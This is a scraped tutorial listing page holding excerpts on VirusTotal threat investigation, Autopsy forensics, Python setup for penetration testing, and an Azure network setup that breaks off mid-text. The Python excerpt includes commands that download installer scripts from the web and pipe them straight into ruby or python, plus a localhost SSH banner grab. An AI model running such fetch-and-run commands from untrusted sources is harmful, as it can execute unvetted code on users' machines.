Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-mastering-threat-detection-with-virustotal-a-guide-for-soc-analysts
Mostafa Yahia
11 Nov 2024
15 min read
Save for later

Mastering Threat Detection with VirusTotal: A Guide for SOC Analysts

Mostafa Yahia
11 Nov 2024
15 min read
This article is an excerpt from the book, "Effective Threat Investigation for SOC Analysts", by Mostafa Yahia. This is a practical guide that enables SOC professionals to analyze the most common security appliance logs that exist in any environment.IntroductionIn today’s cybersecurity landscape, threat detection and investigation are essential for defending against sophisticated attacks. VirusTotal, a powerful Threat Intelligence Platform (TIP), provides security analysts with robust tools to analyze suspicious files, domains, URLs, and IP addresses. Leveraging VirusTotal’s extensive security database and community-driven insights, SOC analysts can efficiently detect potential malware and other cyber threats. This article delves into the ways VirusTotal empowers analysts to investigate suspicious digital artifacts and enhance their organization’s security posture, focusing on critical features such as file analysis, domain reputation checks, and URL scanning.Investigating threats using VirusTotalVirusTotal is a  Threat Intelligence Platform (TIP) that allows security analysts to analyze suspicious files, hashes, domains, IPs, and URLs to detect and investigate malware and other cyber threats. Moreover, VirusTotal is known for its robust automation capabilities, which allow for the automatic sharing of this intelligence with the broader security community. See Figure 14.1:Figure 14.1 – The VirusTotal platform main web pageThe  VirusTotal scans submitted artifacts, such as hashes, domains, URLs, and IPs, against more than 88 security solution signatures and intelligence databases. As a SOC analyst, you should use the VirusTotal platform to investigate the  following:Suspicious filesSuspicious domains and URLsSuspicious outbound IPsInvestigating suspicious filesVirusTotal allows cyber security analysts to analyze suspicious files either by uploading the file or searching for the file hash’s reputation. Either after uploading a fi le or submitting a file hash for analysis, VirusTotal scans it against multiple antivirus signature databases and predefined YARA rules and analyzes the file behavior by using different sandboxes.After the analysis of the submitted file is completed, VirusTotal provides analysts with general information about the analyzed file in five tabs; each tab contains a wealth of information. See Figure 14.2:Figure 14.2 – The details and tabs provided by analyzing a file on VirusTotalAs you see in the preceding figure, aft er submitting the file to the VirusTotal platform for analysis, the file was analyzed against multiple vendors’ antivirus signature databases, Sigma detection rules, IDS detection rules, and several sandboxes for dynamic analysis.The preceding figure is the first page provided by VirusTotal after submitting the file. As you can see, the first section refers to the most common name of the submitted file hash, the file hash, the number of antivirus vendors and sandboxes that flagged the submitted hash as malicious, and tags of the suspicious activities performed by the file when analyzed on the sandboxes, such as the persistence tag, which means that the executable file tried to maintain persistence. See Figure 14.3:Figure 14.3 – The first section of the first page from VirusTotal when analyzing a fileThe first tab of the five tabs provided by the VirusTotal platform that appear is the DETECTION tab. The first parts of the DETECTION tab include the matched Sigma rules, IDS rules, and dynamic analysis results from the sandboxes. See Figure 14.4:Figure 14.4 – The first parts of the DETECTION tabThe Sigma rules are threat detection rules designed to analyze system logs. Sigma was built to allow collaboration between the SOC teams as it allows them to share standardized detection rules regardless of the SIEM in place to detect the various threats by using the event logs. VirusTotal sandboxes store all event logs that are generated during the file detonation, which are later used to test against the list of the collected Sigma rules from different repositories. VirusTotal users will find the list of Sigma rules matching a submitted file in the DETECTION tab. As you can see in the preceding figure, it appears that the executed file has performed certain actions that have been identified by running the Sigma rules against the sandbox logs. Specifically, it disabled the Defender service, created an Auto-Start Extensibility Point (ASEP) entry to maintain persistence, and created another executable.Then as can be  observed, VirusTotal shows that the Intrusion Detection System (IDS) rules successfully detected the presence of Redline info-stealer malware's Command and Control (C&C) communication that matched four IDS rules.Important Note: It is noteworthy that both Sigma and IDS rules are assigned a severity level, and analysts can easily view the matched rule as well as the number of matches.Following the successful matching against IDS rules, you will find the dynamic sandboxes’ detections of the submitted file. In this case, the sandboxes categorized the submitted file/hash as info-stealer malware.Finally, the last part of the DETECTION tab is Security vendors’ analysis. See Figure 14.5:Figure 14.5 – The Security vendors’ analysis sectionAs you see in the preceding figure, the submitted fi le or hash is flagged as malicious by several security vendors and most of them label the given file as a Redline info-stealer malware.The second tab is the DETAILS tab, which includes the Basic properties section on the given file, which includes the file hashes, file type, and file size. That tab also includes times such as file creation, first submission on the platform, last submission on the platform, and last analysis times. Additionally, this tab provides analysts with all the filenames associated with previous submissions of the same file. See Figure 14.6:Figure 14.6 – The first three sections of the DETAILS tabMoreover, the DETAILS tab provides analysts with useful information such as signature verification, enabling identification of whether the file is digitally signed, a key indicator of its authenticity and trustworthiness. Additionally, the tab presents crucial insights into the imported Dynamic Link Libraries (DLLs) and called libraries, allowing analysts to understand the file intents.The third tab is the RELATIONS tab, which includes the IoCs of the analyzed file, such as the domains and IPs that the file is connected with, the files bundled with the executable, and the files dropped by the executable. See Figure 14.7:Figure 14.7 – The RELATIONS tabImportant noteWhen analyzing a malicious file, you can use the connected IPs and domains to scope the infection in your environment by using network security system logs such as the firewall and the proxy logs. However, not all the connected IPs and domains are necessarily malicious and may also be legitimate domains or IPs used by the malware for malicious intents.At the bottom of the RELATIONS tab, VirusTotal provides a great graph that binds the given file and all its relations into one graph, which should facilitate your investigations. To maximize the graph in a new tab, click on it. See Figure 14.8:Figure 14.8 – VT Relations graphThe fourth tab is the BEHAVIOR tab, which contains the detailed sandbox analysis of the submitted file. This report is presented in a structured format and includes the tags, MITRE ATT&CK Tactics and Techniques conducted by the executed file, matched IDS and Sigma rules, dropped files, network activities, and process tree information that was observed during the analysis of the given file. See Figure 14.9:Figure 14.9 – The BEHAVIOR tabRegardless of the matched signatures of security vendors, Sigma rules, and IDS rules, the BEHAVIOR tab allows analysts to examine the file’s actions and behavior to determine whether it is malicious or not. This feature is especially critical in the investigation of zero-day malware, where traditional signature-based detection methods may not be effective, and in-depth behavior analysis is required to identify and respond to potential threats.The fifth tab is the COMMUNITY tab, which allows analysts to contribute to the VirusTotal community with their thoughts and to read community members’ thoughts regarding the given file. See Figure 14.10:Figure 14.10 – The COMMUNITY tabAs you can see, we have two comments from two sandbox vendors indicating that the file is malicious and belongs to the Redline info-stealer family according to its behavior during the dynamic analysis of the file.Investigating suspicious domains and URLsA SOC analyst may depend on the VirusTotal platform to investigate suspicious domains and URLs. You can analyze the suspicious domain or URL on the VirusTotal platform either by entering it into the URL or Search form.During the Investigating suspicious files section, we noticed while navigating the RELATION tab that the file had established communication with the hueref[.]eu domain. In this section, we will investigate the hueref[.]eu domain by using the VirusTotal platform. See Figure 14.11:Figure 14.11 – The DETECTION tabUpon submitting the suspicious domain to the Search form in VirusTotal, it was discovered that the domain had several tags indicating potential security risks. These tags refer to the web domain category. As you can see in the preceding screenshot, there are two tags indicating that the domain is malicious.The first provided tab is the DETECTION tab, which include the Security vendors’ analysis. In this case, several security vendors labeled the domain as Malware or a Malicious domain.The second tab is the DETAILS tab, which includes information about the given domain such as the web domain categories from different sources, the last DNS records of the domain, and the domain Whois lookup results. See Figure 14.12:Figure 14.12 – The DETAILS tabThe third tab is the RELATIONS tab, which provides analysts with all domain relations, such as the DNS resolving the IP(s) of the given domain, along with their reputations, and the files that communicated with the given domain when previously analyzed in the VirusTotal sandboxes, along with their reputations. See Figure 14.13.Figure 14.13 – The RELATIONS tabThe RELATIONS tab is very useful, especially when investigating potential zero-day malicious domains that have not yet been detected and fl agged by security vendors. By analyzing the domain’s resolving IP(s) and their reputation, as well as any connections between the domain and previously analyzed malicious files on the VT platform, SOC analysts can quickly and accurately identify potential threats that potentially indicate a C&C server domain.At the bottom of the RELATIONS tab, you will find the same VirusTotal graph discussed in the previous section.The fourth tab is the COMMUNITY tab, which allows you to contribute to the VirusTotal community with your thoughts and read community members’ thoughts regarding the given domain.Investigating suspicious outbound IPsAs a security analyst, you may depend on the VirusTotal platform to investigate suspicious outbound IPs that your internal systems may have communicated with. By entering the IP into the search form, the VirusTotal platform will show you nearly the same tab details provided when analyzing domains in the last section.In this section, we will investigate the IP of the hueref[.]eu domain. As we mentioned, the tabs and details provided by VirusTotal when analyzing an IP are the same as those provided when analyzing a domain. Moreover, the RELATIONS tab in VirusTotal provides all domains hosted on this IP and their reputations. See Figure 14.14:Figure 14.14 – Domains hosted on the same IP and their reputationsImportant noteIt’s not preferred to depend on the VirusTotal platform to investigate suspicious inbound IPs such as port-scanning IPs and vulnerability-scanning IPs. This is due to the fact that VirusTotal relies on the reputation assessments provided by security vendors, which are particularly effective in detecting outbound IPs such as those associated with C&C servers or phishing activities.By the end of this section, you should have learned how to investigate suspicious files, domains, and outbound IPs by using the VirusTotal platform.ConclusionIn conclusion, VirusTotal is an invaluable resource for SOC analysts, enabling them to streamline threat investigations by analyzing artifacts through multiple detection engines and sandbox environments. From identifying malicious file behavior to assessing suspicious domains and URLs, VirusTotal’s capabilities offer comprehensive insights into potential threats. By integrating this tool into daily workflows, security professionals can make data-driven decisions that enhance response times and threat mitigation strategies. Ultimately, VirusTotal not only assists in pinpointing immediate risks but also contributes to a collaborative, community-driven approach to cybersecurity.Author BioMostafa Yahia is a passionate threat investigator and hunter who hunted and investigated several cyber incidents. His experience includes building and leading cyber security managed services such as SOC and threat hunting services. He earned a bachelor's degree in computer science in 2016. Additionally, Mostafa has the following certifications: GCFA, GCIH, CCNA, IBM Qradar, and FireEye System engineer. Mostafa also provides free courses and lessons through his Youtube channel. Currently, he is the cyber defense services senior leader for SOC, Threat hunting, DFIR, and Compromise assessment services in an MSSP company.
Read more
  • 0
  • 0
  • 87002

article-image-digital-forensics-using-autopsy
Savia Lobo
24 May 2018
10 min read
Save for later

Getting started with Digital forensics using Autopsy

Savia Lobo
24 May 2018
10 min read
Digital forensics involves the preservation, acquisition, documentation, analysis, and interpretation of evidence from various storage media types. It is not only limited to laptops, desktops, tablets, and mobile devices but also extends to data in transit which is transmitted across public or private networks. In this tutorial, we will cover how one can carry out digital forensics with Autopsy. Autopsy is a digital forensics platform and graphical interface to the sleuth kit and other digital forensics tools. This article is an excerpt taken from the book, 'Digital Forensics with Kali Linux', written by Shiva V.N. Parasram. Let's proceed with the analysis using the Autopsy browser by first getting acquainted with the different ways to start Autopsy. Starting Autopsy Autopsy can be started in two ways. The first uses the Applications menu by clicking on Applications | 11 - Forensics | autopsy: Alternatively, we can click on the Show applications icon (last item in the side menu) and type autopsy into the search bar at the top-middle of the screen and then click on the autopsy icon: Once the autopsy icon is clicked, a new terminal is opened showing the program information along with connection details for opening The Autopsy Forensic Browser. In the following screenshot, we can see that the version number is listed as 2.24 with the path to the Evidence Locker folder as /var/lib/autopsy: To open the Autopsy browser, position the mouse over the link in the terminal, then right-click and choose Open Link, as seen in the following screenshot: Creating a new case To create a new case, follow the given steps: When the Autopsy Forensic Browser opens, investigators are presented with three options. Click on NEW CASE: Enter details for the Case Name, Description, and Investigator Names. For the Case Name, I've entered SP-8-dftt, as it closely matches the image name (8-jpeg-search.dd), which we will be using for this investigation. Once all information is entered, click NEW CASE: Several investigator name fields are available, as there may be instances where several investigators may be working together. The locations of the Case directory and Configuration file are displayed and shown as created.  It's important to take note of the case directory location, as seen in the screenshot: Case directory (/var/lib/autopsy/SP-8-dftt/) created. Click ADD HOST to continue: Enter the details for the Host Name (name of the computer being investigated) and the Description of the host. Optional settings: Time zone: Defaults to local settings, if not specified Timeskew Adjustment: Adds a value in seconds to compensate for time differences Path of Alert Hash Database: Specifies the path of a created database of known bad hashes Path of Ignore Hash Database: Specifies the path of a created database of known good hashes similar to the NIST NSRL: Click on the ADD HOST button to continue. Once the host is added and directories are created, we add the forensic image we want to analyze by clicking the ADD IMAGE button: Click on the ADD IMAGE FILE button to add the image file: To import the image for analysis, the full path must be specified. On my machine, I've saved the image file (8-jpeg-search.dd) to the Desktop folder. As such, the location of the file would be /root/Desktop/ 8-jpeg-search.dd. For the Import Method, we choose Symlink. This way the image file can be imported from its current location (Desktop) to the Evidence Locker without the risks associated with moving or copying the image file. If you are presented with the following error message, ensure that the specified image location is correct and that the forward slash (/) is used: Upon clicking Next, the Image File Details are displayed. To verify the integrity of the file, select the radio button for Calculate the hash value for this image, and select the checkbox next to Verify hash after importing? The File System Details section also shows that the image is of a ntfs partition. Click on the ADD button to continue: After clicking the ADD button in the previous screenshot, Autopsy calculates the MD5 hash and links the image into the evidence locker. Press OK to continue: At this point, we're just about ready to analyze the image file. If there are multiple cases listed in the gallery area from any previous investigations you may have worked on, be sure to choose the 8-jpeg-search.dd file and case: Before proceeding, we can click on the IMAGE DETAILS option. This screen gives detail such as the image name, volume ID, file format, file system, and also allows for the extraction of ASCII, Unicode, and unallocated data to enhance and provide faster keyword searches. Click on the back button in the browser to return to the previous menu and continue with the analysis: Before clicking on the ANALYZE button to start our investigation and analysis, we can also verify the integrity of the image by creating an MD5 hash, by clicking on the IMAGE INTEGRITY button: Several other options exist such as FILE ACTIVITY TIMELINES, HASH DATABASES, and so on. We can return to these at any point in the investigation. After clicking on the IMAGE INTEGRITY button, the image name and hash are displayed. Click on the VALIDATE button to validate the MD5 hash: The validation results are displayed in the lower-left corner of the Autopsy browser window: We can see that our validation was successful, with matching MD5 hashes displayed in the results. Click on the CLOSE button to continue. To begin our analysis, we click on the ANALYZE button: Analysis using Autopsy Now that we've created our case, added host information with appropriate directories, and added our acquired image, we get to the analysis stage. After clicking on the ANALYZE button (see the previous screenshot), we're presented with several options in the form of tabs, with which to begin our investigation: Let's look at the details of the image by clicking on the IMAGE DETAILS tab. In the following snippet, we can see the Volume Serial Number and the operating system (Version) listed as Windows XP: Next, we click on the FILE ANALYSIS tab. This mode opens into File Browsing Mode, which allows the examination of directories and files within the image. Directories within the image are listed by default in the main view area: In File Browsing Mode, directories are listed with the Current Directory specified as C:/. For each directory and file, there are fields showing when the item was WRITTEN, ACCESSED, CHANGED, and CREATED, along with its size and META data: WRITTEN: The date and time the file was last written to ACCESSED: The date and time the file was last accessed (only the date is accurate) CHANGED: The date and time the descriptive data of the file was modified CREATED: The data and time the file was created META: Metadata describing the file and information about the file: For integrity purposes, MD5 hashes of all files can be made by clicking on the GENERATE MD5 LIST OF FILES button. Investigators can also make notes about files, times, anomalies, and so on, by clicking on the ADD NOTE button: The left pane contains four main features that we will be using: Directory Seek: Allows for the searching of directories File Name Search: Allows for the searching of files by Perl expressions or filenames ALL DELETED FILES: Searches the image for deleted files EXPAND DIRECTORIES: Expands all directories for easier viewing of contents By clicking on EXPAND DIRECTORIES, all contents are easily viewable and accessible within the left pane and main window. The + next to a directory indicates that it can be further expanded to view subdirectories (++) and their contents: To view deleted files, we click on the ALL DELETED FILES button in the left pane. Deleted files are marked in red and also adhere to the same format of WRITTEN, ACCESSED, CHANGED, and CREATED times. From the following screenshot, we can see that the image contains two deleted files: We can also view more information about this file by clicking on its META entry. By viewing the metadata entries of a file (last column to the right), we can also view the hexadecimal entries for the file, which may give the true file extensions, even if the extension was changed. In the preceding screenshot, the second deleted file (file7.hmm) has a peculiar file extension of .hmm. Click on the META entry (31-128-3) to view the metadata: Under the Attributes section, click on the first cluster labelled 1066 to view header information of the file: We can see that the first entry is .JFIF, which is an abbreviation for JPEG File Interchange Format. This means that the file7.hmm file is an image file but had its extension changed to .hmm. Sorting files Inspecting the metadata of each file may not be practical with large evidence files. For such an instance, the FILE TYPE feature can be used. This feature allows for the examination of existing (allocated), deleted (unallocated), and hidden files. Click on the FILE TYPE tab to continue: Click Sort files into categories by type (leave the default-checked options as they are) and then click OK to begin the sorting process: Once sorting is complete, a results summary is displayed. In the following snippet, we can see that there are five Extension Mismatches: To view the sorted files, we must manually browse to the location of the output folder, as Autopsy 2.4 does not support viewing of sorted files. To reveal this location, click on View Sorted Files in the left pane: The output folder locations will vary depending on the information specified by the user when first creating the case, but can usually be found at /var/lib/autopsy/<case name>/<host name>/output/sorter-vol#/index.html. Once the index.html file has been opened, click on the Extension Mismatch link: The five listed files with mismatched extensions should be further examined by viewing metadata content, with notes added by the investigator. Reopening cases in Autopsy Cases are usually ongoing and can easily be restarted by starting Autopsy and clicking on OPEN CASE: In the CASE GALLERY, be sure to choose the correct case name and, from there, continue your examination: To recap, we looked at forensics using the Autopsy Forensic Browser with The Sleuth Kit. Compared to individual tools, Autopsy has case management features and supports various types of file analysis, searching, and sorting of allocated, unallocated, and hidden files. Autopsy can also perform hashing on a file and directory levels to maintain evidence integrity. If you enjoyed reading this article, do check out, 'Digital Forensics with Kali Linux' to take your forensic abilities and investigations to a professional level, catering to all aspects of a digital forensic investigation from hashing to reporting. What is Digital Forensics? IoT Forensics: Security in an always connected world where things talk Working with Forensic Evidence Container Recipes
Read more
  • 0
  • 0
  • 72212

article-image-python-scripting-essentials
Packt
17 May 2016
15 min read
Save for later

Python Scripting Essentials

Packt
17 May 2016
15 min read
In this article by Rejah Rehim, author of the book Mastering Python Penetration Testing, we will cover: Setting up the scripting environment in different operating systems Installing third-party Python libraries Working with virtual environments Python language basics (For more resources related to this topic, see here.) Python is still the leading language in the world of penetration testing (pentesting) and information security. Python-based tools include all kinds oftools used for inputting massive amounts of random data to find errors and security loop holes, proxies, and even the exploit frameworks. If you are interested in tinkering with pentesting tasks, Python is the best language to learn because of its large number of reverse engineering and exploitation libraries. Over the years, Python has received numerous updates and upgrades. For example, Python 2 was released in 2000 and Python 3 in 2008. Unfortunately, Python 3 is not backward compatible; hence most of the programs written in Python 2 will not work in Python 3. Even though Python 3 was released in 2008, most of the libraries and programs still use Python 2. To do better penetration testing, the tester should be able to read, write, and rewrite python scripts. As a scripting language, security experts have preferred Python as a language to develop security toolkits. Its human-readable code, modular design, and large number of libraries provide a start for security experts and researchers to create sophisticated toolswith it. Python comes with a vast library (standard library) that accommodates almost everything from simple I/O to platform-specific APIcalls. Many of the default and user-contributed libraries and modules can help us in penetration testing with building tools to achieve interesting tasks. Setting up the scripting environment Your scripting environment is basically the computer you use for your daily workcombined with all the tools in it that you use to write and run Python programs. The best system to learn on is the one you are using right now. This section will help you to configure the Python scripting environment on your computer so that you can create and run your own programs. If you are using Mac OS X or Linux installation in your computer, you may have a Python Interpreter pre-installed in it. To find out if you have one, open terminal and type python. You will probably see something like this: $ python Python 2.7.6 (default, Mar 22 2014, 22:59:56) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> From the preceding output, we can see that Python 2.7.6 is installed in this system. By issuing python in your terminal, you started Python interpreter in the interactive mode. Here, you can play around with Python commands; what you type will run and you'll see the outputs immediately. You can use your favorite text editor to write your Python programs. If you do not have one, then try installing Geany or Sublime Text and it should be perfect for you. These are simple editors and offer a straightforward way to write as well as run your Python programs. In Geany, the output is shown in a separate terminal window, whereas Sublime Text uses an embedded terminal window. Sublime Text is not free, but it has a flexible trial policy that allows you to use the editor without any stricture. It is one of the few cross-platform text editors that is quite apt for beginners and has a full range of functions targeting professionals. Setting up in Linux Linux system is built in a way that makes it smooth for users to get started with Python programming. Most Linux distributions already have Python installed. For example, the latest versions of Ubuntu and Fedora come with Python 2.7. Also, the latest versions of Redhat Enterprise (RHEL) and CentOS come with Python 2.6. Just for the records, you might want to check it. If it is not installed, the easiest way to install Python is to use the default package manger of your distribution, such as apt-get, yum, and so on. Install Python by issuing the following commands in the terminal. For Debian / Ubuntu Linux / Kali Linux users: sudo apt-get install python2 For Red Hat / RHEL / CentOS Linux user sudo yum install python To install Geany, leverage your distribution'spackage manger. For Debian / Ubuntu Linux / Kali Linux users: sudo apt-get install geany geany-common For Red Hat / RHEL / CentOS Linux users: sudo yum install geany Setting up in Mac Even though Macintosh is a good platform to learn Python, many people using Macs actually run some Linux distribution or the other on their computer or run Python within a virtual Linux machine. The latest version of Mac OS X, Yosemite, comes with Python 2.7 preinstalled. Once you verify that it is working, install Sublime Text. For Python to run on your Mac, you have to install GCC, which can be obtained by downloading XCode, the smaller command-line tool. Also, we need to install Homebrew, a package manager. To install Homebrew, open Terminal and run the following: $ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" After installing Homebrew, you have to insert the Homebrew directory into your PATH environment variable. You can do this by including the following line in your ~/.profile file: export PATH=/usr/local/bin:/usr/local/sbin:$PATH Now that we are ready to install Python 2.7, run the following command in your terminal that will do the rest: $ brew install python To install Sublime Text, go to Sublime Text's downloads page in http://www.sublimetext.com/3 and click on the OS X link. This will get you the Sublime Text installer for your Mac. Setting up in Windows Windows does not have Python preinstalled on it. To check whether it isinstalled, open a command prompt and type the word python, and press Enter. In most cases, you will get a message that says Windows does not recognize python as a command. We have to download an installer that will set Python for Windows. Then, we have to install and configure Geany to run Python programs. Go to Python's download page in https://www.python.org/downloads/windows/and download the Python 2.7 installer, which is compatible with your system. If you are not aware of your operating systems architecture, then download 32-bit installers, which will work on both the architectures, but 64-bit will only work on 64-bit systems. To install Geany, go to Geany'sdownload page viahttp://www.geany.org/Download/Releases and download the full installer variant, which has a description Full Installer including GTK 2.16. By default, Geany doesn't know where Python resides on your system. So, we need to configure it manually. For this, write a Hello world program in Geany, save it anywhere in your system as hello.py, and run it. There are three methods you can run a python program in Geany: Select Build | Execute. Press F5. Click the icon with three gears on it: When you have a running hello.py program in Geany, go to Build | Set Build Commands. Then, enter the python commands option withC:Python27python -m py_compile "%f"and execute command withC:Python27python "%f". Now, you can run your Python programs while coding in Geany. It is recommended to run a Kali Linux distribution as a virtual machine and use this as your scripting environment. Kali Linux comes with a number of tools preinstalled and is based on Debian Linux, so you'll also be able to install a wide variety of additional tools and libraries. Also, some of the libraries will not work properly on Windows systems. Installing third-party libraries We will be using many Python libraries and this section will help you install and use third-party libraries. Setuptools and pip One of the most useful pieces of third-party Python software is Setuptools. With Setuptools, you could download and install any compliant Python libraries with a single command. The best way to install Setuptools on any system is to download the ez_setup.py file from https://bootstrap.pypa.io/ez_setup.pyand run this file with your Python installation. In Linux, run this in terminal with the correct path to theez_setup.py script: sudo python path/to/ez_setup.py For Windows 8 or the older versions of Windows with PowerShell 3 installed, start Powershell with Administrative privileges and run this command in it: > (Invoke-WebRequest https://bootstrap.pypa.io/ez_setup.py).Content | python - For Windows systems without a PowerShell 3 installed, download the ez_setup.py file from the link provided previously using your web browser and run that file with your Python installation. pipis a package management system used to install and manage software packages written in Python.After the successful installation of Setuptools, you can install pip by simply opening a command prompt and running the following: $ easy_install pip Alternatively, you could also install pip using your default distribution package managers: On Debian, Ubuntu and Kali Linux: sudo apt-get install python-pip On Fedora: sudo yum install python-pip Now, you could run pip from the command line. Try installing a package with pip: $ pip install packagename Working with virtual environments Virtual environment helps separate dependencies required for different projects; by working inside the virtual environment, it also helps to keep our global site-packages directory clean. Using virtualenv and virtualwrapper virtualenv is a python module which helps to create isolated Python environments for our each scripting experiments, which creates a folder with all necessary executable files and modules for a basic python project. You can install virtual virtualenv with the following command: sudo pip install virtualenv To create a new virtual environment,create a folder and enter into the folder from commandline: $ cd your_new_folder $ virtualenv name-of-virtual-environment This will initiate a folder with the provided name in your current working directory with all the Python executable files and pip library, which will then help install other packages in your virtual environment. You can select a Python interpreter of your choice by providing more parameters, such as the following command: $ virtualenv -p /usr/bin/python2.7 name-of-virtual-environment This will create a virtual environment with Python 2.7 .We have to activate it before we start using this virtual environment: $ source name-of-virtual-environment/bin/activate Now, on the left-hand side of the command prompt, the name of the active virtual environment will appear. Any package that you install inside this prompt using pip will belong to the active virtual environment, which will be isolated from all the other virtual environments and global installation. You can deactivate and exit from the current virtual environment using this command: $ deactivate virtualenvwrapper provides a better way to use virtualenv. It also organize all the virtual environments in one place. To install, we can use pip, but let's make sure we have installed virtualenv before installing virtualwrapper. Linux and OS X users can install it with the following method: $ pip install virtualenvwrapper Also,add thesethree lines inyour shell startup file like .bashrc or .profile. export WORKON_HOME=$HOME/.virtualenvs export PROJECT_HOME=$HOME/Devel source /usr/local/bin/virtualenvwrapper.sh This will set theDevel folder in your home directory as the location of your virtual environment projects. For Windows users, we can use another package virtualenvwrapper-win . This can also be installed with pip. pip install virtualenvwrapper-win Create a virtual environment with virtualwrapper: $ mkvirtualenv your-project-name This creates a folder with the provided name inside ~/Envs. To activate this environment, we can use workon command: $ workon your-project-name These two commands can be combined with the single one,as follows: $ mkproject your-project-name We can deactivate the virtual environment with the same deactivate command in virtualenv. To delete a virtual environment, we can use the following command: $ rmvirtualenv your-project-name Python language essentials In this section, we will go through the idea of variables, strings, data types, networking, and exception handling. As an experienced programmer, this section will be just a summarization of what you already know about Python. Variables and types Python is brilliant in case of variables—variable point to data stored in a memory location. This memory location may contain different values, such as integer, real number, Booleans, strings, lists, and dictionaries. Python interprets and declares variables when you set some value to this variable. For example, if we set: a = 1 andb = 2 Then, we will print the sum of these two variables with: print (a+b) The result will be 3 as Python will figure out both a and b are numbers. However, if we had assigned: a = "1" and b = "2" Then,the output will be 12, since both a and b will be considered as strings. Here, we do not have to declare variables or their type before using them, as each variable is an object. The type() method can be used to getthe variable type. Strings As any other programming language, strings are one of the important things in Python. They are immutable. So, they cannot be changed once they are defined. There are many Python methods, which can modify string. They do nothing to the original one, but create a copy and return after modifications. Strings can be delimited with single quotes, double quotes, or in case of multiple lines, we can use triple quotes syntax. We can use the character to escape additional quotes, which come inside a string. Commonly used string methods are: string.count('x'):This returns the number of occurrences of 'x' in the string string.find('x'):This returns the position of character 'x'in the string string.lower():This converts the string into lowercase string.upper():This converts the string into uppercase string.replace('a', 'b'):This replaces alla with b in the string Also, we can get the number of characters including white spaces in a string with the len() method. #!/usr/bin/python a = "Python" b = "Pythonn" c = "Python" print len(a) print len(b) print len(c) You can read more about the string function via https://docs.python.org/2/library/string.html. Lists Lists allow to store more than one variable inside it and provide a better method for sorting arrays of objects in Python. They also have methods that will help to manipulate the values inside them. list = [1,2,3,4,5,6,7,8] print (list[1]) This will print 2, as the Python index starts from 0. Print out the whole list: list = [1,2,3,4,5,6,7,8] for x in list: print (x) This will loop through all the elements and print them. Useful list methods are: .append(value):This appends an element at the end of list .count('x'):This gets the the number of 'x' in list .index('x'):This returns the index of 'x' in list .insert('y','x'):This inserts 'x' at location 'y' .pop():This returns last element and also remove it from list .remove('x'):This removes first 'x' from list .reverse():This reverses the elements in the list .sort():This sorts the list alphabetically in ascending order, or numerical in ascending order Dictionaries A Python dictionary is a storage method for key:value pairs. In Python, dictionaries are enclosed in curly braces, {}. For example, dictionary = {'item1': 10, 'item2': 20} print(dictionary['item2']) This will output 20. We cannot create multiple values with the same key. This will overwrite the previous value of the duplicate keys. Operations on dictionaries are unique. Slicing is not supported in dictionaries We can combine two distinct dictionaries to one by using the update method. Also, the update method will merge existing elements if they conflict: a = {'apples': 1, 'mango': 2, 'orange': 3} b = {'orange': 4, 'lemons': 2, 'grapes ': 4} a.update(b) Print a This will return: {'mango': 2, 'apples': 1, 'lemons': 2, 'grapes ': 4, 'orange': 4} To delete elements from a dictionary, we can use the del method: del a['mango'] print a This will return: {'apples': 1, 'lemons': 2, 'grapes ': 4, 'orange': 4} Networking Sockets are the basic blocks behind all the network communications by a computer. All network communications go through a socket. So, sockets are the virtual endpoints of any communication channel that takes place between two applications, which may reside on the same or different computers. The socket module in Python provides us a better way to create network connections with Python. So, to make use of this module, we will have to import this in our script: import socket socket.setdefaulttimeout(3) newSocket = socket.socket() newSocket.connect(("localhost",22)) response = newSocket.recv(1024) print response This script will get the response header from the server. Handling Exceptions Even though we wrote syntactically correct scripts, there will be some errors while executing them. So, we will have to handle the errors properly. The simplest way to handle exception in Python is try-except: Try to divide a number with zero in your Python interpreter: >>> 10/0 Traceback (most recent call last): File "<stdin>", line 1, in <module> ZeroDivisionError: integer division or modulo by zero So, we can rewrite this script with thetry-except blocks: try: answer = 10/0 except ZeroDivisionError, e: answer = e print answer This will return the error integer division or modulo by zero. Summary Now, we have an idea about basic installations and configurations that we have to do before coding. Also, we have gone through the basics of Python, which may help us speed up scripting. Resources for Article:   Further resources on this subject: Exception Handling in MySQL for Python [article] An Introduction to Python Lists and Dictionaries [article] Python LDAP applications - extra LDAP operations and the LDAP URL library [article]
Read more
  • 0
  • 0
  • 67256

article-image-how-to-create-and-connect-a-virtual-network-in-azure-for-windows-365
Christiaan Brinkhoff, Sandeep Patnaik, Morten Pedholt
31 Oct 2024
15 min read
Save for later

How to Create and Connect a Virtual Network in Azure for Windows 365

Christiaan Brinkhoff, Sandeep Patnaik, Morten Pedholt
31 Oct 2024
15 min read
This article is an excerpt from the book, Mastering Windows 365, by Jonathan R. Danylko. Mastering Windows 365 provides you with detailed knowledge of cloud PCs by exploring its designing model and analyzing its security environment. This book will help you extend your existing skillset with Windows 365 effectively.Introduction In today's cloud-centric world, establishing a secure and efficient network infrastructure is crucial for businesses of all sizes. Microsoft Azure, with its robust set of networking tools, provides a seamless way to connect various environments, including Windows 365. In this guide, we will walk you through the process of creating a virtual network in Azure, and how to connect it to a Windows 365 environment. Whether you're setting up a new network or integrating an existing one, this step-by-step tutorial will ensure you have the foundation necessary for a successful deployment. Creating a virtual network in Azure Start by going to https://portal.azure.com/ and create a new virtual network. It's quite straightforward. You can use all the default settings, but take care that you aren't overlapping the address space with an existing one you are already using: 1. Start by logging in to https://portal.azure.com. 2. Start the creation of a new virtual network. From here, choose the Resource group option and the name of the virtual network. When these have been defi ned, choose Next.  Figure 3.5 – Virtual network creation basic information 3. There are some security features you can enable on the virtual network. Th ese features are optional, but  Azure Firewall  should be considered if no other fi rewall solution is deployed.  When you are ready, click on Next.  Figure 3.6 – Virtual network creation security 4. Now the IP address range and subnets must be defined. Once these have been defi ned, click on Next.                                                       Figure 3.7 – Virtual network creation | IP addresses 5. Next, we can add any Azure tags that might be required for your organization. We will leave it as is in this case. Click on Next.                                                        Figure 3.8 – Virtual network | Azure tags selection 6. We are now able to see an overview of the entire configuration of the new virtual network.  When you have reviewed this, click on Create.                                                           Figure 